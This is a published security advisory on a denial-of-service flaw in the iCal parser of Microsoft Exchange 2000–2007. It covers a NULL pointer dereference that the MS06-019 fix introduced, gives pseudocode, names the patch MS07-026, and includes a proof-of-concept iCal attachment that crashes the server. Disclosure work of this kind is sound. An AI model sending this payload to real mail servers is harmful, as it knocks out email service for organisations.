Security Research
by Alexander Sotirov
Exchange calendar MODPROPS denial of service
Vendor notification: Dec 20, 2006
Vendor patch: MS07-026
Public disclosure: May 8, 2007
Systems affected
- Exchange 2000
- Exchange 2003
- Exchange 2007
Overview
There is a denial of service vulnerability in the code responsible for parsing iCal email attachments in Microsoft Exchange. This vulnerability can be exploited by a malicious email message and results in a denial of service. The vulnerable code is present in Exchange 2000 and 2003.
Microsoft fixed a related vulnerability with the MS06-019 security update, but their fix introduced a new denial of service bug. I was able to develop an exploit that works against fully-patched Exchange servers.
Technical details
The iCal file format is described in detail in RFC2445. The file consists of a series of records, delimited by BEGIN and END tags. Each record can have multiple named properties. The iCal parser in Exchange maintains a table of properties valid in the current context and switches to the appropriate table upon entering a new record.
The X-MICROSOFT-CDO-MODPROPS property is an undocumented Microsoft extension which allows the iCal file to specify a list of properties that are considered valid in a specific record. All other properties will be ignored by Exchange. The following example shows a typical usage of this feature:
BEGIN:VEVENT X-MICROSOFT-CDO-MODPROPS:BEGIN,DTEND,DTSTART,END DTSTART:19970714T170000Z DTEND:19970715T035959Z SUMMARY:Bastille Day Party END:VEVENT
In this example, the SUMMARY property will not be processed by Exchange.
When the parser encounters the MODPROPS property, it calls CICalSchema::AllocPropTables to allocate a new table of valid properties. The pointer to the new table is stored in this->field_F0 and the list of valid properties is copied into the table. If there is a second MODPROPS property, the function will be called again and will reuse the previousely allocated table. If the second MODPROPS element is longer than the first one, the copy loop will write past the end of the table.
This vulnerability was fixed in MS06-019 by adding a call to CICalSchema::FreePropTables in the beginning of the AllocPropTables function. This ensures that the previous property table is freed and AllocPropTables allocates a new one of sufficient size.
Unfortunately, FreePropTables also sets the this->field_28 pointer to NULL. This NULL pointer is later used in a memcpy operation in AllocPropTables and causes an unhandled exception, resulting in a crash of Exchange.
// Allocate a new property table int CICalSchema::AllocPropTables(arg_0, arg_4) { this->FreePropTables(); ... // Allocate space for the new table if (this->field_F0 == NULL) this->field_F0 = new(vector_size*16); ... // NULL pointer dereference of this->field_28 memcpy(&this->field_F4[offset_F4], &this->field_28[index*20], 20); } // Free the property table void CICalSchema::FreePropTables() { if (this->field_F0 != NULL) { ... ExFree(this->field_F0); this->field_F0 = NULL; } if (this->field_F4 != NULL) { if (this->field_28 == this->field_F4) { this->field_28 = NULL; // set this->field_28 to NULL this->field_1C = 0; } ExFree(this->field_F4); this->field_F4 = NULL; } ... }
Proof of concept
The following iCal attachment trigger the vulnerability and crash Exchange when the email is opened in Outlook Web Access:
BEGIN:VCALENDAR VERSION:2.0 BEGIN:VEVENT X-MICROSOFT-CDO-MODPROPS:BEGIN,END,X-MICROSOFT-CDO-MODPROPS X-MICROSOFT-CDO-MODPROPS:BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN,BEGIN END:VEVENT END:VCALENDAR
Solution
The this->field_28 variable should not be initialized to NULL in FreePropTables, or the code that uses it should check if the pointer is NULL.